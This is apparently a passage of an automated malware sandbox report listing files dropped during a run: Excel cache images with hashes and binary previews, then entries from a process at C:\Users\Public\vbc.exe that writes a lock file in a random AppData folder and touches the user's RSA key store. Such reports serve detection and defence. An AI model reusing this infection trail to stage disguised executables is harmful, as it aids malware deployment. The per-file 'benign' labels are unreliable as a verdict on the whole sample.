                            Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32420706.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):84203
                            Entropy (8bit):7.979766688932294
                            Encrypted:false
                            SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                            MD5:208FD40D2F72D9AED77A86A44782E9E2
                            SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                            SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                            SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4091E51A.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                            Category:dropped
                            Size (bytes):8815
                            Entropy (8bit):7.944898651451431
                            Encrypted:false
                            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                            MD5:F06432656347B7042C803FE58F4043E1
                            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5A2D31B2.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):51166
                            Entropy (8bit):7.767050944061069
                            Encrypted:false
                            SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                            MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                            SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                            SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                            SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63F24961.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):7592
                            Entropy (8bit):5.455885888544303
                            Encrypted:false
                            SSDEEP:96:znp5cqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwO:bp2STxK/LA/FVoL3QtKhn+e3+wO
                            MD5:F90940F79806885D4D1066FF87C79506
                            SHA1:4292293781E28C72F1BD8D888A87E99F70EABFB3
                            SHA-256:0BC0CE96702BEBFC824C0957DDB9193BA5AC80E7D9600F73DA1F055401D77EBF
                            SHA-512:5B2D5FABEDDEAE601F9EADAE8D0AC88255111ADF3B9E53C9B6CC45CFE1B042ED14E7942C82A440EEA85F9B11E27FBD930FB934505EC8E26DB78B182296196E6A
                            Malicious:false
                            Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................=.6.).X.......d..........................'.q....\.............L..W.q........6Ov_.q......qX.=.Dy.w.P4...............w..4.$.......d..........J^.q.... ^.qHB4..P4.8^......-...4...<.w................<..v.Zfv....X..o....X.=.......................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BC1535.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):79394
                            Entropy (8bit):7.864111100215953
                            Encrypted:false
                            SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                            MD5:16925690E9B366EA60B610F517789AF1
                            SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                            SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                            SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                            Malicious:false
                            Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79991ED9.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):49744
                            Entropy (8bit):7.99056926749243
                            Encrypted:true
                            SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                            MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                            SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                            SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                            SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                            Malicious:false
                            Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\826EFC38.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):51166
                            Entropy (8bit):7.767050944061069
                            Encrypted:false
                            SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                            MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                            SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                            SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                            SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                            Malicious:false
                            Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BBCBF4F.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):50311
                            Entropy (8bit):7.960958863022709
                            Encrypted:false
                            SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                            MD5:4141C7515CE64FED13BE6D2BA33299AA
                            SHA1:B290F533537A734B7030CE1269AC8C5398754194
                            SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                            SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                            Malicious:false
                            Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6AB76E0.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):648132
                            Entropy (8bit):2.8124530118203914
                            Encrypted:false
                            SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                            MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                            SHA1:F677467423105ACF39B76CB366F08152527052B3
                            SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                            SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                            Malicious:false
                            Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7035FEE.emf
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):7608
                            Entropy (8bit):5.085491918831368
                            Encrypted:false
                            SSDEEP:96:+Sp5LSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5pW+sW31RGtdVDYM3VfmkpH
                            MD5:332C0E448848C1DCFAC18AAA237E2151
                            SHA1:319D4EBF0024ED92F0424C6BF949EACD22236441
                            SHA-256:F1CB1DBD79CC21483BBCD58E689B95C4F0EDACEDD6F1E3239F655C6529718682
                            SHA-512:8607DFBDF76369D68CAD592CCFB79FFA55FFD472E83B2D30D9AF9B5B56E8D2B5E2964EF885090A2ABA02310EC425D0617BC2D7BCEB1E70715095F507F6512DAD
                            Malicious:false
                            Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................=.6.).X.......d..........................'.q....\.............L..W.q........6Ov_.q......qX.=.Dy.w.P4...............w..4.$.......d..........J^.q.... ^.qHB4..P4.8^......-...4...<.w................<..v.Zfv....X..o....X.=.......................gvdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C83AFE53.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):79394
                            Entropy (8bit):7.864111100215953
                            Encrypted:false
                            SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                            MD5:16925690E9B366EA60B610F517789AF1
                            SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                            SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                            SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                            Malicious:false
                            Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1A2B317.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):49744
                            Entropy (8bit):7.99056926749243
                            Encrypted:true
                            SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                            MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                            SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                            SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                            SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                            Malicious:false
                            Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5DD422C.png
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):84203
                            Entropy (8bit):7.979766688932294
                            Encrypted:false
                            SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                            MD5:208FD40D2F72D9AED77A86A44782E9E2
                            SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                            SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                            SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                            Malicious:false
                            Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB863104.jpeg
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                            Category:dropped
                            Size (bytes):8815
                            Entropy (8bit):7.944898651451431
                            Encrypted:false
                            SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                            MD5:F06432656347B7042C803FE58F4043E1
                            SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                            SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                            SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                            Malicious:false
                            Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                            C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                            Process:C:\Users\Public\vbc.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):598
                            Entropy (8bit):0.6390116820665388
                            Encrypted:false
